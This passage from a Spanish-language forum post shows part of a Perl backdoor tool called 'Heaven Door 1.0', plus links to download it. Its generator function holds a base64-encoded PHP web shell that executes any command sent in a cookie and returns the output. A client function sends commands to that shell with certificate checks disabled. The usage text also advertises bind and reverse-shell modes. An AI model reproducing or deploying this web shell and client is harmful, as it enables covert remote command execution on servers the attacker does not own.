169. if ( $comando =~ /exit/ ) {
170. copyright();
171. }
172. my $code = cargar_comando($url,$comando);
173. if(check_backdoor($code)) {
174. my $output = extract_command_backdoor($code);
175. if($output ne "") {
176. printear_titulo("\n".$output."\n");
177. } else {
178. printear_titulo("\n"."[-] Invalid command"."\n");
179. }
180. } else {
181. printear_titulo("\n"."[-] Invalid command"."\n");
182. }
183. }
184. } else {
185. printear_logo("</li><li type="square"> Backdoor not exists\n");[/li][/list]
186. }
187. }
189. sub check_backdoor {
190. my $text = shift;
191. if($text=~/\[code\_heaven\](.*?)\[\/code\_heaven\]/s) {
192. return 1;
193. } else {
194. return 0;
195. }
196. }
198. sub extract_command_backdoor {
199. my $text = shift;
200. if($text=~/\[code\_heaven\](.*?)\[\/code\_heaven\]/s) {
201. return $1;
202. } else {
203. return "";
204. }
205. }
207. sub cargar_generador_backdoor {
208. my $filename = shift;
209. if(-f $filename) {
210. unlink($filename);
211. }
212. printear_titulo("</li><li type="square"> Generating backdoor ...\n\n");[/li][/list]
213. generar_backdoor($filename);
214. if(-f $filename) {
215. printear("</li><li type="square"> Backdoor $filename generated !\n");[/li][/list]
216. } else {
217. printear("[-] Error generating backdoor\n");
218. }
219. }
221. sub generar_backdoor {
222. my $filename = shift;
223. my $code = "PD9waHAgaWYgKGlzc2V0KCRfQ09PS0lFWyJoZWF2ZW5fZG9vcl9oZXJlIl0pICYmICFlbXB0eSgkX0NPT0tJRVsiaGVhdmVuX2Rvb3JfaGVyZSJdKSkgeyAJJGNvZGUgPSAiIjsgCSRvdXRwdXQgPSAiIjsgCWV4ZWMoJF9DT09LSUVbImhlYXZlbl9kb29yX2hlcmUiXSwkY29kZSk7IAlmb3JlYWNoICgkY29kZSBhcyAkbGluZSkgeyAJCSRvdXRwdXQgPSAkb3V0cHV0IC4gJGxpbmUuIlxuIjsgCX0gCWVjaG8gYmFzZTY0X2VuY29kZSgiW2NvZGVfaGVhdmVuXSIuJG91dHB1dC4iWy9jb2RlX2hlYXZlbl0iKTsgfSA";
224. savefile($filename,decode_base64($code));
225. }
227. sub cargar_comando {
228. my($url,$command) = @_;
229. my $nave = LWP::UserAgent->new(ssl_opts => {verify_hostname => 0,SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE});
230. $nave->agent("Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
231. $nave->timeout(10);
232. my $contenido = $nave->get($url,Cookie => "heaven_door_here=".$command)->content;
233. return decode_base64($contenido);
234. }
236. sub savefile {
237. my ($filename,$text) = @_;
238. open( SAVE, ">>" . $filename );
239. print SAVE $text . "\n";
240. close SAVE;
241. }
243. sub printear {
244. cprint( "\x036" . $_[0] . "\x030" );
245. }
247. sub printear_logo {
248. cprint( "\x037" . $_[0] . "\x030" );
249. }
251. sub printear_titulo {
252. cprint( "\x0310" . $_[0] . "\x030" );
253. }
255. sub sintax {
257. printear("</li><li type="square"> Sintax : ");[/li][/list]
258. print "perl $0 <option> <value>\n";
259. printear("\n</li><li type="square"> Options : \n\n");[/li][/list]
260. print "-backdoor -port <port> : Enable backdoor in port\n";
261. print "-reverse -ip <ip> -port <port> : Get all tags GPS of a image\n";
262. print "-generate_backdoor -filename <filename> : Generate backdoor in filename\n";
263. print "-connect_backdoor -url <url> : Connect to backdoor in URL\n";
264. printear("\n</li><li type="square"> Example : ");[/li][/list]
265. print "perl heaven_door.pl -reverse -ip 127.0.0.1 -port 666\n";
266. copyright();
267. }
269. sub head {
270. printear_logo("\n-- == Heaven Door 1.0 == --\n\n\n");
271. }
273. sub copyright {
274. printear_logo("\n\n-- == (C) Doddy Hackman 2016 == --\n\n");
275. exit(1);
276. }
278. #The End ?
Un video con ejemplos de uso :

Si quieren bajar el programa lo pueden hacer de aca :

SourceForge.
Github.

Eso seria todo.

Páginas: [1] 2 3 ... 28